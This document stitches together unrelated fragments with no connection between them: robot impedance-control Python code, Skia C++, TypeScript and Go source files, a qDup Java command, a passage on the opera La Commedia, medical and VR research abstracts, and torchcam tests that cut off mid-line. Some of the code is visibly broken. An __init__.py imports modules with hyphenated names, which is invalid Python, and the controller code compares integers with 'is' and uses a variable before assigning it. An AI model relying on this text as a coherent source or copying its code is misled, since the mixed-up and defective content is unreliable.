np.append(0,tauc) # insert #tauc = np.hstack((a[0:4], np.zeros(12), a[4:])) # Compute torque nullspace tau_nullspace = np.dot((np.eye(7) - np.dot(Jnull.T, Jpinv.T) ), (np.dot( self.Kn, (self.jointState.qnull - self.jointState.q)) - np.dot(self.Bn, self.jointState.qd))) tau = tauc + tau_nullspace + tg return tau def impedance_control_equilibrium(self, impctrl, rb, ndof, *args): # For the classical impedance controller without redundancy if args: rb.ndof = 7 if args[0].lower() in ['rpy']: J = rb.calcJac(qin) Ja = rb.analyticJacobian(J, self.state_end.x[3:], 'rpy') # Fix for jacobian dot later if args[0].lower() in ['quaternion']: J = rb.calcJac(self.jointState.q) Jd = rb.calcJacDot(self.jointState.q, self.jointState.qd) Ja = rb.analyticJacobian(J, self.state_end.quat, 'quaternion6') Jad = rb.analyticJacobianDot(J, Jd, self.state_end.quat, self.state_end.quat_d) # For the classical impedance controller without redundancy if ndof is 6: qin = np.zeros(6) qdin = np.zeros(6) qin[0] = self.jointState.q[1] qin[1] = self.jointState.q[2] qin[2] = self.jointState.q[3] qin[3] = self.jointState.q[4] qin[4] = self.jointState.q[5] qin[5] = self.jointState.q[6] qdin[0] = self.jointState.qd[1] qdin[1] = self.jointState.qd[2] qdin[2] = self.jointState.qd[3] qdin[3] = self.jointState.qd[4] qdin[4] = self.jointState.qd[5] qdin[5] = self.jointState.qd[6] Ja = np.delete(Ja, 0, 1) Jad = np.delete(Jad, 0, 1) rb.ndof = 6 else: qin = self.jointState.q qdin = self.jointState.qd # Reset DoF rb.ndof = 7 # Cartesian Coriolis Matrix # mu = rb.ccoriolisComp() C = rb.coriolisComp(self.jointState.q, self.jointState.qd) # Jointspace gravitational load vector tg = rb.gravloadComp(self.jointState.q, rb.grav) # Computing Jacobian: Jnull = rb.calcJac(self.jointState.q) Jpinv = rb.pinv(Jnull) # Compute torque "cartesian" tauc = np.dot(J.T, ( - np.dot(impctrl.cartesian_stiffness_, self.error.x) - np.dot(impctrl.cartesian_damping_, self.error.xd) )) # Append to torque if ndof 6 sim if ndof is 6: # At the beginning tauc = np.array([0,tauc[0],tauc[1],tauc[2],tauc[3],tauc[4],tauc[5]]) # Compute torque nullspace tau_nullspace = np.dot((np.eye(7) - np.dot(Jnull.T, Jpinv.T) ), (np.dot( impctrl.nullspace_stiffness_, (self.jointState.qnull - self.jointState.q)) - np.dot(np.dot(2, np.sqrt(impctrl.nullspace_stiffness_)), self.jointState.qd))) tau = tauc + tau_nullspace + np.dot(C, self.jointState.qd) + tg return tau def outputEndeffector(self, rb, *args): kine = rb.forwardKinematics(self.jointState.q) Xftr = kine.transl if args: if args[0].lower() in ['rpy']: rpy = kine.rpy Xf = np.array([Xftr[0], Xftr[1], Xftr[2], rpy[0], rpy[1], rpy[2]]) Xfd_calc = rb.calcXd(self.jointState.q, self.jointState.qd, 'rpy') Xfd = np.array([Xfd_calc[0], Xfd_calc[1], Xfd_calc[2], Xfd_calc[3], Xfd_calc[4], Xfd_calc[5]]) if args[0].lower() in ['quaternion']: rot = kine.R quatf = quaternion.from_rotation_matrix(rot) # quatf_float = rb.mat2quat(rot) # quatf = quaternion.from_float_array(quatf_float) Xf = np.array([Xftr[0], Xftr[1], Xftr[2], quatf.x, quatf.y, quatf.z]) Xfd_calc = rb.calcXd(self.jointState.q, self.jointState.qd) # quatf_d = quaternion.from_float_array(Xfd_calc[3:]) Xfd = np.array([Xfd_calc[0], Xfd_calc[1], Xfd_calc[2], Xfd_calc[3], Xfd_calc[4], Xfd_calc[5]]) self.state_end.quat = quatf # self.state_end.quat_d = quatf_d self.state_end.x = Xf self.state_end.xd = Xfd def output_equilibrium_update(self, rb): kine = rb.forwardKinematics(self.jointState.q) Xftr = kine.transl rot = kine.R quatf = quaternion.from_rotation_matrix(rot) Xf = np.array([Xftr[0], Xftr[1], Xftr[2], quatf.x, quatf.y, quatf.z]) self.state_end.quat = quatf self.state_end.x = Xf def quat_subtract(self, quat_des, quat_end): orientation_d = quaternion.as_float_array(quat_des) orientation = quaternion.as_float_array(quat_end) # Sign Ambiguity if (orientation_d[1:].dot(orientation[1:]) < 0.0): quat_end.x = -orientation[1] quat_end.y = -orientation[2] quat_end.z = -orientation[3] eq = quat_end.inverse() * quat_des # eq = np.array([eq_t.x, eq_t.y, eq_t.z]) # eta_e = quat_end.w # eps_e = np.array([quat_end.x, quat_end.y, quat_end.z]) # eta_d = quat_des.w # eps_d = np.array([quat_des.x, quat_des.y, quat_des.z]) # eps_d_skew = np.array([[0, -eps_d[2], eps_d[1]], # [eps_d[2], 0, -eps_d[0]], # [-eps_d[1], eps_d[0], 0]]) # eq = (eta_d * eps_e) - (eta_e * eps_d) - eps_d_skew.dot(eps_e) return eq def quat_subtract2(self, quat_des, quat_end): orientation_d = quaternion.as_float_array(quat_des) orientation = quaternion.as_float_array(quat_end) # Sign Ambiguity if (orientation_d[1:].dot(orientation[1:]) < 0.0): quat_end.x = -orientation[1] quat_end.y = -orientation[2] quat_end.z = -orientation[3] # eq = np.array([eq_t.x, eq_t.y, eq_t.z]) eta_e = quat_end.w eps_e = np.array([quat_end.x, quat_end.y, quat_end.z]) eta_d = quat_des.w eps_d = np.array([quat_des.x, quat_des.y, quat_des.z]) eps_d_skew = np.array([[0, -eps_d[2], eps_d[1]], [eps_d[2], 0, -eps_d[0]], [-eps_d[1], eps_d[0], 0]]) eq = (eta_d * eps_e) - (eta_e * eps_d) - eps_d_skew.dot(eps_e) return eq def feedbackError3(self, rb, *args): kine = rb.forwardKinematics(self.jointState.q, 'tool') rot = kine.R R_e = block_diag(rot, rot) if args: if args[0].lower() in ['rpy']: e = self.state_end.x - self.state_des.x e = rot.dot(e) ed = self.state_end.xd - self.state_des.xd if args[0].lower() in ['quaternion']: ep = self.state_end.x[:3] - self.state_des.x[:3] eq = self.quat_subtract(self.state_des.quat, self.state_end.quat) eqt = quaternion.as_float_array(eq) eqt = 2*eqt[1:] # eqt = 2*np.dot(rot, eqt) e = np.array([ep[0], ep[1], ep[2], eqt[0], eqt[1], eqt[2]]) # e = np.dot(R_e, e) edp = (self.state_end.xd - self.state_des.xd) ed = np.array([edp[0], edp[1], edp[2], edp[3], edp[4], edp[5]]) # ed = np.dot(R_e, e) # self.error.quat = eq # self.error.quat_d = edq self.error.x = e self.error.xd = ed self.error.quat = eq # self.error.quat_d = edq def feedback_equilibrium(self, rb): kine = rb.forwardKinematics(self.jointState.q) rot = kine.R ep = self.state_end.x[:3] - self.state_des.x[:3] ep = np.dot(rot, ep) eq = self.quat_subtract(self.state_des.quat, self.state_end.quat) eqt = quaternion.as_float_array(eq) eqt = eqt[1:] eqt = np.dot(rot, eqt) e = np.array([ep[0], ep[1], ep[2], eqt[0], eqt[1], eqt[2]]) self.error.x = e def qIntegrate(self, qacc, dx): # Integrate from acceleration to velocity qdtemp = np.concatenate((self.data.qdd, qacc.reshape(7,1)), axis=1) qd = np.trapz(qdtemp, axis=1) * dx #Integrate from velocity to position qtemp = np.concatenate((self.data.qd, qd.reshape(7,1)), axis=1) q = np.trapz(qtemp, axis=1) * dx self.data.qdd = np.concatenate(( self.data.qdd, qacc.reshape(7,1)),axis=1) self.data.qd = np.concatenate(( self.data.qd, qd.reshape(7,1)),axis=1) self.data.q = np.concatenate(( self.data.q, q.reshape(7,1)),axis=1) self.jointState.q = q self.jointState.qd = qd
<gh_stars>1-10 /* * Copyright 2019 Google LLC * * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #include "src/gpu/GrTextureResolveRenderTask.h" #include "src/gpu/GrGpu.h" #include "src/gpu/GrMemoryPool.h" #include "src/gpu/GrOpFlushState.h" #include "src/gpu/GrRenderTarget.h" #include "src/gpu/GrResourceAllocator.h" #include "src/gpu/GrTexturePriv.h" void GrTextureResolveRenderTask::init(const GrCaps& caps) { if (GrSurfaceProxy::ResolveFlags::kMSAA & fResolveFlags) { GrRenderTargetProxy* renderTargetProxy = fTarget->asRenderTargetProxy(); SkASSERT(renderTargetProxy); SkASSERT(renderTargetProxy->isMSAADirty()); renderTargetProxy->markMSAAResolved(); } if (GrSurfaceProxy::ResolveFlags::kMipMaps & fResolveFlags) { GrTextureProxy* textureProxy = fTarget->asTextureProxy(); SkASSERT(GrMipMapped::kYes == textureProxy->mipMapped()); SkASSERT(textureProxy->mipMapsAreDirty()); textureProxy->markMipMapsClean(); } // Add the target as a dependency: We will read the existing contents of this texture while // generating mipmap levels and/or resolving MSAA. // // NOTE: This must be called before makeClosed. this->addDependency(fTarget.get(), GrMipMapped::kNo, GrTextureResolveManager(nullptr), caps); fTarget->setLastRenderTask(this); // We only resolve the texture; nobody should try to do anything else with this opsTask. this->makeClosed(caps); } void GrTextureResolveRenderTask::gatherProxyIntervals(GrResourceAllocator* alloc) const { // This renderTask doesn't have "normal" ops. In this case we still need to add an interval (so // fEndOfOpsTaskOpIndices will remain in sync), so we create a fake op# to capture the fact that // we manipulate fTarget. alloc->addInterval(fTarget.get(), alloc->curOp(), alloc->curOp(), GrResourceAllocator::ActualUse::kYes); alloc->incOps(); } bool GrTextureResolveRenderTask::onExecute(GrOpFlushState* flushState) { // Resolve msaa before regenerating mipmaps. if (GrSurfaceProxy::ResolveFlags::kMSAA & fResolveFlags) { GrRenderTarget* renderTarget = fTarget->peekRenderTarget(); SkASSERT(renderTarget); if (renderTarget->needsResolve()) { flushState->gpu()->resolveRenderTarget(renderTarget); } } if (GrSurfaceProxy::ResolveFlags::kMipMaps & fResolveFlags) { GrTexture* texture = fTarget->peekTexture(); SkASSERT(texture); if (texture->texturePriv().mipMapsAreDirty()) { flushState->gpu()->regenerateMipMapLevels(texture); } } return true; }
/** * Created by F1 on 2017/6/1. */ export class TMenu { id: number; code: string; title: string; parentId: number; href: string; icon: string; orderNum: string; path: string; enabled: string = "Y"; createTime:string; updateTime:string; }
La Commedia Performance history Following its Amsterdam premiere, La Commedia was performed in 2010 in concert version but with the same cast and musicians at the Disney Concert Hall in Los Angeles and Carnegie Hall in New York. It received a further concert performance in London at the Barbican in 2016 performed by the BBC Symphony Orchestra with Cristina Zavalloni and Claron McFadden reprising their original roles as Dante and Beatrice. The opera won the 2011 Grawemeyer Award for Music Composition, and in 2014 the recording of the premiere production was released on CD and DVD. Reception Ivan Hewett of The Telegraph wrote, “Like all Andriessen’s best pieces, this showed a man constantly engaged, in the most passionate terms, with the unfathomable dichotomies of human life; passion versus rationality, matter versus spirit, life and death.” Andrew Clements of The Guardian rated the Dutch National Opera set four out of five stars and argued, “The tone is wonderfully varied – sometimes profoundly serious, sometimes wildly exuberant or irreverent – matched to a score that is equally diverse and eclectic.” In the Los Angeles Times, Mark Swed lauded it as a “profoundly moving, if slyly unsentimental, meditation on life, love and death [...] it is Andriessen’s “Italian” opera and has the depth, musical richness and (I predict) lasting power of late Verdi.” Swed praised “the humor, the ingratiating jazziness, the terrible fury and, in the end, the ravishing grace of the later scenes.“ In a 2019 poll of critics and editors of The Guardian, the opera was ranked the seventh greatest classical composition of the 21st century, with Clements referring to the score as “wonderfully polyglot”.
<reponame>haming123/wego<filename>worm/model_type.go package worm import ( "reflect" "strings" "sync" ) /* type DB_User struct { DB_id int64 `db:";autoincr"` DB_name string Age int `db:"age"` Creatat time.Time `db:"creatat;insert_only"` } */ const ( STR_AUTOINCR string = "autoincr" STR_NOT_INSERT string = "n_insert" STR_NOT_UPDATE string = "n_update" STR_NOT_SELECT string = "n_select" ) type TableName interface { TableName() string } type FieldInfo struct { FieldIndex int FieldName string FieldType reflect.Type DbName string AutoIncr bool NotInsert bool NotUpdate bool NotSelect bool } type ModelInfo struct { Fields []FieldInfo TableName string FieldID string } //struct信息的缓存 var g_model_cache map[reflect.Type]*ModelInfo = make(map[reflect.Type]*ModelInfo) var g_model_mutex sync.Mutex func getModelInfoUseCache(v_ent reflect.Value) *ModelInfo { g_model_mutex.Lock() defer g_model_mutex.Unlock() v_ent = reflect.Indirect(v_ent) t_ent := v_ent.Type() info, ok := g_model_cache[t_ent] if ok { return info } info = getModelInfo(v_ent) g_model_cache[t_ent] = info return info } func getModelInfo(v_ent reflect.Value) *ModelInfo { minfo := ModelInfo{} minfo.TableName = getTableName(v_ent) v_ent = reflect.Indirect(v_ent) t_ent := v_ent.Type() f_num := t_ent.NumField() for i:=0; i < f_num; i++{ ff := t_ent.Field(i) field_name := ff.Name db_name := getFieldName(ff) if len(db_name) < 1 { continue } finfo := FieldInfo{} finfo.FieldIndex = i finfo.FieldName = field_name finfo.FieldType = ff.Type finfo.DbName = db_name parselFeildTag(&finfo, ff) if strings.ToLower(db_name) == "id" { minfo.FieldID = db_name finfo.AutoIncr = true } minfo.Fields = append(minfo.Fields, finfo) } return &minfo } func getTableName(v_ent reflect.Value) string { var t_ent = v_ent.Type() var tpTableName = reflect.TypeOf((*TableName)(nil)).Elem() if t_ent.Implements(tpTableName) { return v_ent.Interface().(TableName).TableName() } if v_ent.Kind() == reflect.Ptr { v_ent = v_ent.Elem() if v_ent.Type().Implements(tpTableName) { return v_ent.Interface().(TableName).TableName() } } else if v_ent.CanAddr() { v1 := v_ent.Addr() if v1.Type().Implements(tpTableName) { return v1.Interface().(TableName).TableName() } } t_name := t_ent.Name() t_name = strings.ToLower(t_name) ind := strings.Index(t_name, "db_") if ind>=0 { ind += 3 t_name = t_name[ind:] } return t_name } func getFieldName(ff reflect.StructField) string { f_name := "" ind := strings.Index(ff.Name, "DB_") if ind >= 0 { ind += 3 f_name = ff.Name[ind:] } tag := ff.Tag.Get("db") parts := strings.Split(tag, ";") part0 := strings.Trim( parts[0], " ") if part0 == "-" { f_name = "" } else if part0 != "" { f_name = part0 } return f_name } func parselFeildTag(finfo *FieldInfo, ff reflect.StructField) { tag := ff.Tag.Get("db") if tag == "" { return } parts := strings.Split(tag, ";") for i, item := range parts { //first part is field name if i == 0 { continue } item = strings.Trim(item, " ") if item == STR_AUTOINCR { finfo.AutoIncr = true } else if item == STR_NOT_INSERT { finfo.NotInsert = true } else if item == STR_NOT_UPDATE { finfo.NotUpdate = true } else if item == STR_NOT_SELECT { finfo.NotSelect = true } } }
Leptin Resistance: A Possible Interface Between Obesity and Pulmonary-Related Disorders Context Under normal physiological conditions, leptin regulates body weight by creating a balance between food intake and energy expenditure. However, in obesity, serum leptin levels increase and become defective to retain energy balance. Evidence Acquisition Elevated serum leptin levels are regarded as an established marker of obesity. It is also reported that obese asthmatic patients have maximum serum leptin levels compared to other groups such as non-obese asthmatics, and normal obese and non obese subjects without asthma. In addition to having an appetite suppressing effect, leptin also regulates certain acute-phase protein expressions including -1 antitrypsin (A1AT) in the liver. Results A1AT is a protease inhibitor that counterbalances the activity of the neutrophil elastase (NE) enzyme. A1AT reductions in obese-leptin resistant subjects lead to increased NE activity. The overactivity of NE degrades lung tissue proteins, which may lead to pulmonary disorders including asthma. Conclusions On the basis of prior studies, it could be hypothesized that, in obese asthmatic patients, the highest degree of leptin failure/resistance might lead to the creation of an imbalance between NE and its inhibitor A1AT. To ascertain this, large scale prospective studies are warranted to assess the comparative serum leptin and A1AT levels and NE activity in asthmatic non-obese and obese patients, simultaneously. Such studies might help to devise novel interventional therapies for the treatment of pulmonary-related problems including asthma, chronic obstructive pulmonary disorder (COPD), and other lung defects in susceptible obese subjects in the future. Context Obesity is characterized by an excessive accumulation of fat in the adipose tissue. A product of the obese (Ob) gene, called leptin, is released primarily from adipocytes and plays a key role in regulating body weight. In most obese subjects, leptin fails to perform its physiological functions in spite of its high serum levels. Obesity is linked with several disorders including cardiovascular diseases (CVDs), certain types of cancer, type 2 diabetes, and it raises the risk of pulmonary defects. Recently, Arteaga-Solis et al. demonstrated that leptin resistance leads to increased parasympathetic tone, which in turn causes bronchoconstriction and obesityassociated asthma. Another previous study described a link between hypoventilation and adiposity. Phipps et al. proposed that hyperleptinemia is a cause of respiratory failure in obese leptin-resistant subjects. It has been suggested that a derangement of leptin expression in adipocytes may affect the lungs and promote asthma. Interestingly, a previous study reported the highest levels of serum leptin occur in asthmatic obese patients compared to the other human groups including non-obese controls, obese subjects, and asthmatic non obese patients. Serum leptin elevation has already been shown to be an established marker of leptin resistance in severe obesity. This might lead to the creation of an imbalance between -1 antitrypsin (A1AT) and NE activity. A severe deficiency of serum A1AT is important in the development of chronic obstructive pulmonary disorder (COPD) and asthma, which might be due to the degradation of lung tissue elastin by NE-enhanced activity. Briefly, on the basis of the facts described above, it could be postulated that leptin resistance with a protease-antiprotease imbalance may be vital for the obesity predisposition to pulmonary disorders including, among others, asthma and COPD. This review is divided into two parts. The first part highlights body weight regulation and the disruption of leptin's physiological function in obesity. The second part summarizes a possible link between obesity and pulmonary disorders. Body Weight Regulation by the Leptin Hormone Leptin was first identified in 1994 in the obese (ob/ob) mouse model. It is a 16 kDa non glycated protein consisting of 167 amino acids and is primarily expressed in adipose tissues. It is encoded by the obese gene (Ob gene), located on chromosome number 7 in humans, and is responsible for regulating the balance between food intake and energy expenditure. During starvation, leptin levels go down, which increases appetite and decreases energy consumption. On the other hand, with sufficient energy stores, leptin inhibits appetite and permits the utilization of energy stores. Leptin regulates energy expenditure and food intake by communicating with the central nervous system (CNS) via its receptor (Ob-Rb) located in the hypothalamus. The hypothalamus is the key site for leptin detection as it contains two types of neurons: type 1 expresses appetite suppressing peptides derived from pro-opiomelanocortin (POMC) precursors, whereas type 2 produces appetite stimulating peptides such as neuropeptide Y (NPY) and agouti-related peptide (AgRP). Leptin suppresses appetite by counteracting NPY and AgRP, whereas leptin activates POMC mRNA expression, which enhances the release of a potent appetitesuppressing peptide, alpha-melanocyte stimulating hormone (-MSH). Mechanisms of leptin action and dysfunction are shown in Figures 1 and 2, respectively. Obesity and Leptin Dysfunction Different causes underlie the disruption of leptin's physiological functions. Some studies have shown that obese (Ob/Ob) mice are leptin deficient, and diabetic (db/db) mice have mutated leptin receptors contributing to leptin dysfunctions. A rare genetic disorder has been reported in obese humans, which might be due to a mutation in the leptin gene and can be treated with exogenous leptin administration. It has been identified that 12 Pakistani, 5 Turkish, 1 Austrian, and 2 Egyptian obese subjects are leptin deficient because of leptin gene mutations. On the other hand, several previous studies have reported that most obese individuals have elevated serum leptin levels, which are positively correlated with body mass index (BMI). Despite having increased serum leptin levels, leptin fails to retain its appetite-suppressing This shows shows that during normal physiological states, leptin binds with its receptors in the brain and suppresses appetite by counteracting NPY and AgRP, however, leptin also induces POMC mRNA expression. Abbreviations: AgRP, agoutirelated peptide; mRNA, messenger ribonucleic acid; NPY, neuropeptide Y; Ob, leptin; Ob-Rb, leptin receptor; POMC, pro-opiomelanocortin. effect of reducing weight in obese subjects. Approximately 30 fold higher leptin concentrations were required for weight reduction in obesity. The failure of leptin to function in severely obese subjects may be due to extracellular circulating factors. An interaction between circulating leptin and serum leptin interacting proteins (SLIPs) contributes to leptin failures. This leptin appetite suppressing effect, which is markedly impaired in obese subjects, is shown in Figure 2. Induction of A1AT Expression by Leptin in Hepatocytes Leptin is structurally identical to the granulocyte colony-stimulating factor (GCSF). GCSF is a member of the interleukin-6 (IL-6) family that includes IL-6 and oncostatin-M (OSM) cytokines. In addition to leptin's control of energy homeostasis by stimulating its hypothalamic receptor, the Janus kinase/signal transducer and activator of transcription (JAK/STAT) signaling is essential in peripheral tissues, especially in the liver. This is vital because it affects differential expression of the target genes of acute phase proteins (APPs), including A1AT. Using a wide range of techniques, it has been shown that OSM induces a functional response after 24 hours via STAT3 binding to the STAT sequence. Moreover, different reports using gel shift and luciferase assays have identified that a perfect consensus for STAT present in the 3'-A1AT enhancer This figure shows that in obesity, leptin cannot bind with its receptors situated in the brain (hypothalamus), resulting in adiposity signals arrived due to the stimulation of NPY and AgRP expression with a concomitant decrease of POMC mRNA expression. The leptin failure leads to severe obesity that is associated with various disorders including insulin resistance, T2D, CVD, hypertension, and asthma. Abbreviations: AgRP, agouti-related peptide; CVD, cardiovascular disease; NPY, neuropeptide Y; Ob, leptin; Ob-Rb, leptin receptor; POMC, pro-opiomelanocortin; T2D, type 2 diabetes. region was capable of binding the transcription factor STAT3. For other cell types such as monocytes and macrophages, lipopolysaccharides (LPS) up-regulate the A1AT gene, which is also stimulated in the lung epithelial tissues in response to OSM. In HepG2 cells, the A1AT gene regulation occurs at the transcriptional stage, which is mediated primarily via hepatocyte promoters containing the STAT3 sequence. The A1AT levels were stimulated up to three folds by two IL-6 and OSM in HepG2 cell lines. It was suggested that the short and long leptin receptor isoforms were expressed in HepG2 hepatic cells, which supports the hypothesis that, like OSM cytokines, leptin might act to regulate few gene targets in hepatocytes. Recently, Jiang's laboratory demonstrated that the expression of the A1AT gene was leptin-dependent in mouse models and leptin stimulation increases the A1AT levels both at the mRNA and protein levels via the JAK/STAT3 pathway in cultured hepatic Hep1-6 cell lines. A specific tyrosine residue, Tyr 1138, in the intracellular domain of the leptin receptor (Ob-Rb) mediates the activation of STAT3. The binding of the leptin-ligand causes the Ob-Rb to undergo homo-oligomerization and subsequently binds to JAK2. Only Ob-Rb possesses the STAT-binding site. In vivo studies have demonstrated that STAT3 is the major transcriptional factor in signaling. Binding of Ob-Rb with JAK2 leads to the JAK2 autophosphorylation and the phosphorylation of Tyr985, tyr1077, and Tyr 1138 on the Ob-Rb receptor. The phosphorylation of Tyr1138 recruits STAT3 proteins to the Ob-Rb-JAK2 complex. Tyrosine-phosphorylated STAT3 molecules can dimerize and translocate into the nucleus to activate the transcription of target genes in peripheral tissues such as vascular endothelial cells and HepG2 liver cells. An induction of A1AT expression by leptin is illustrated in Figure 3. This shows shows that leptin binds with its receptors on hepatocytes, successively STAT3 molecules dimerize and translocate into the nucleus and bind with the promoter region of the serpin gene in order to up-regulate the acute phase protein expression, including A1AT. Abbreviations: A1AT, alpha-1-antitrypsin; Jak-STAT3, Janus kinase-signal transducer and activator of transcription. Results In obesity, the disruption of leptin-mediated signaling occurs that may lead to lung function failure by concomitant increases in body weight. Olson et al. suggested that leptin stimulates lung ventilation, whereas leptin deficiencies lead to hypoventilation in obese subjects. The relationship between obesity and asthma is complex and involves several mechanisms. A few recent studies have indicated the highest levels of leptin occur in the sera of asthmatic obese patients relative to the other groups such as asthmatic non obese patients, normal obese subjects, and non-obese subjects without asthma or other pulmonary complications. Canoz et al. report 14.5, 40, and 76% increases in serum leptin in asthmatic obese patients compared to obese subjects without asthma and non-obese subjects, with and without asthma, respectively. Wahab and colleagues have indicated significant increases in serum leptin levels in obese asthmatic patients (25.8 ± 11.1 ng/mL) compared with non-obese asthmatic patients (8.8 ± 11.1 ng/mL). Another study has shown the maximum serum leptin levels in obese asthmatic patients (19.37 ± 14.04 ng/mL) is elevated compared with non-obese asthmatic patients (6.37 ± 2.46 ng/mL) and healthy controls (6.50 ± 3.51 ng/mL). Mahmoud et al. demonstrated maximum serum leptin levels in COPD cases, both in incitement and static conditions, relative to the other groups. Their calculations indicated that, compared to the non obese control subjects, there were 90.34, 68.75, and 64% increases in serum leptin levels in obese with COPD, obese without COPD, and non-obese with COPD cases, respectively. Therefore, these previous investigations clearly indicate that leptin resistance is linked to respiratory/pulmonary-related complications and may contribute to the development of a unique asthma phenotype in obese patients. An elegant study reported that leptin stimulates A1AT expression at both the mRNA and protein levels via the JAK2-STAT3 pathway in liver HepG 2 and Hep 1-6 cell lines. Alternatively, serum levels of A1AT are reduced in obese leptin-resistant subjects with parallel increases in neutrophil elastase (NE) activity. Elevated serum NE levels are also related to airway constriction in obese subjects. In the same obese subjects, increases in C-reactive protein (CRP) have also been reported, which induce leptin resistance via CRP-leptin adduct formation. An imbalance of A1AT and NE leads to lung tissue impairments. Leptin's actions on the brain and hepatocytes are summarized in Figure 4. Hypothesis and Outlook for Further Research In short, previously published data raise the possibility that the protease-antiprotease balance is leptin dependent, and due to the leptin resistance protective capacity of A1AT, it could be arrested to counteract NE activity. Consequently, the degradation of lung tissues, especially elastin, occurs by NE overactivity, which could lead to pulmonary related problems in the susceptible obese population. This hypothesis is summarized as: leptin resistance in asthmatic obese patients may reduce serum alpha 1 antitrypsin levels. In turn, NE enhances, which can lead to the development of pulmonary-related complications including asthma and COPD due to the degradation of proteins in lung tissues. Exploring mechanisms underlying the derangement of protease antiprotease counterparts will aid in devising personalized interventional therapy for particular obese patients prone to lung complications. This option is preferred over generalizing treatment for all patients suffering from respiratory complications, including non-obese subjects.
<reponame>johnaohara/qDup<filename>src/main/java/io/hyperfoil/tools/qdup/cmd/impl/Upload.java package io.hyperfoil.tools.qdup.cmd.impl; import io.hyperfoil.tools.qdup.cmd.Cmd; import io.hyperfoil.tools.qdup.cmd.Context; public class Upload extends Cmd { private String path; private String destination; String populatedPath; String populatedDestination; public Upload(String path, String destination){ this.path = path; this.destination = destination; } public Upload(String path){ this(path,""); } public String getPath(){return path;} public String getDestination(){return destination;} @Override public void run(String input, Context context) { populatedPath = populateStateVariables(path,this, context); populatedDestination = populateStateVariables(destination ,this, context); //create remote directory if(populatedDestination.endsWith("/")) { context.getSession().sh("mkdir -p " + populatedDestination); } context.getLocal().upload( populatedPath, populatedDestination, context.getSession().getHost() ); context.next(path); } @Override public Cmd copy() { return new Upload(this.path,this.destination); } @Override public String toString(){return "upload: "+path+" "+destination;} @Override public String getLogOutput(String output,Context context){ String usePath = populatedPath != null ? populatedPath : path; String useDestination = populatedDestination != null ? populatedDestination : destination; return "upload: "+usePath+" "+useDestination; } }
Congenital Abnormalities: Consequence of Maternal Zika Virus Infection: A Narrative Review. BACKGROUND Zika virus (ZIKV) is a deadly flavivirus that has spread from Africa to Asia and European countries. The virus is associated with other viruses in the same genus or family, transmitted by the same mosquito species with known history of fatality. A sudden increase in the rate of infection from ZIKV has made it a global health concern, which necessitates close symptom monitoring, enhancing treatment options, and vaccine production. OBJECTIVES This paper reviewed current reports on birth defects associated with ZIKV, mode of transmission, body fluids containing the virus, diagnosis, possible preventive measures or treatments, and vaccine development. METHODS Google scholar was used as the major search engine for research and review articles, up to July, 2016. Search terms such as "ZIKV", "ZIKV infection", "ZIKV serotypes", "treatment of ZIKV infection", "co-infection with zika virus", "flavivirus", "microcephaly and zika", "birth defects and Zika", as well as "ZIKV vaccine" were used. RESULTS ZIKV has been detected in several body fluids such as saliva, semen, blood, and amniotic fluid. This reveals the possibility of sexual and mother to child transmission. The ability of the virus to cross the placental barrier and the blood brain barrier (BBB) has been associated with birth defects such as microcephaly, ocular defects, and Guillian Barre syndrome (GBS). Preventive measures can reduce the spread and risk of the infection. Available treatments only target symptoms while vaccines are still under development. CONCLUSION Birth defects are associated with ZIKV infection in pregnant women; hence the need for development of standard treatments, employment of strict preventive measures and development of effective vaccines.
Changes in psychological well-being in female patients with clinically diagnosed depression: an exploratory approach in a therapeutic setting The objective of this exploratory one-group pretest-posttest study was to evaluate the nature of psychological change in inward depressed psychiatric patients attending multi-disciplinary treatment, including physical activity, designed to improve mental well-being. Female depressed psychiatric patients (n=51) were examined before and after this programme over a period of 3 months. The following psychological parameters were assessed: depression, anxiety, global self-esteem, and physical self-perceptions. Depressed patients demonstrated statistically significant improvements in depression, anxiety, global self-esteem and physical self-worth (t ranging from −3.76 to 4.65, all p<0.007; ES ranging from 0.53 to −0.65). Changes in depression and anxiety displayed a strong negative correlation with changes in global self-esteem, and those changes are independent of the initial severity of the depressive symptoms (F ranging from 0.03 to 0.70, n.s.). Patients with greater improvement in physical self-perceptions reported greater improvement anxious symptoms then patients who did not improve. Consequently, within the limitations of the research design it can be concluded that the programme appeared successful in improving psychological well-being in female depressed patients. Results also provide preliminary insight into the potential role of the physical self in recovery.
"""Utility to load compute graphs from diffrent sources.""" import os def load_compute_graph(name): path = os.environ.get('VISION_BONNET_MODELS_PATH', '/opt/aiy/models') with open(os.path.join(path, name), 'rb') as f: return f.read()
<filename>CarDetection_python_codes/__init__.py<gh_stars>1-10 from .extract-features import * from .train-classifier import * from .test_classifier import * from .nms import * from .config import *
Research on an Immersive Interior Decoration Experience and Interactive System Based on Virtual Reality As the widespread application of virtual reality, the home improvement industry has gradually applied this technology to promote house interior decoration. Virtual reality can help consumers experience the design of immersion room in advance and avoid money-consuming. In the paper, we research an immersive interior decoration system with HTC Vive headset to meet the demands of various consumers. A menu layout and three attractive room styles are designed for an excellent visual experience. Furthermore, the using method of handle controllers is created to support effective human-computer interaction. In the end, the feedback of the users demonstrate that our system is user-friendly both in visual and interaction.
<reponame>13263081188/VISUAL_1 # Copyright (C) 2020-2021, <NAME>. # This program is licensed under the Apache License version 2. # See LICENSE or go to <https://www.apache.org/licenses/LICENSE-2.0.txt> for full license details. import pytest import torch from torchcam.cams import core def test_cam_constructor(mock_img_model): model = mock_img_model.eval() # Check that wrong target_layer raises an error with pytest.raises(ValueError): _ = core._CAM(model, '3') def test_cam_precheck(mock_img_model, mock_img_tensor): model = mock_img_model.eval() extractor = core._CAM(model, '0.3') with torch.no_grad(): # Check missing forward raises Error with pytest.raises(AssertionError): extractor(0) # Check that a batch of 2 cannot be accepted _ = model(torch.cat((mock_img_tensor, mock_img_tensor))) with pytest.raises(ValueError): extractor(0) # Correct forward _ = model(mock_img_tensor) # Check incorrect class index with pytest.raises(ValueError): extractor(-1) # Check missing score if extractor._score_used: with pytest.raises(ValueError): extractor(0) @pytest.mark.parametrize( "input_shape, spatial_dims", [ [(8, 8), None], [(8, 8, 8), None], [(8, 8, 8), 2], [(8, 8, 8, 8), None], [(8, 8, 8, 8), 3], ], ) def test_cam_normalize(input_shape, spatial_dims): input_tensor = torch.rand(input_shape) normalized_tensor = core._CAM._normalize(input_tensor, spatial_dims) # Shape check assert normalized_tensor.shape == input_shape # Value check assert not torch.any(torch.isnan(normalized_tensor)) assert torch.all(normalized_tensor <= 1) and torch.all(normalized_tensor >= 0) def test_cam_clear_hooks(mock_img_model): model = mock_img_model.eval() extractor = core._CAM(model, '0.3') assert len(extractor.hook_handles) == 1 # Check that there is 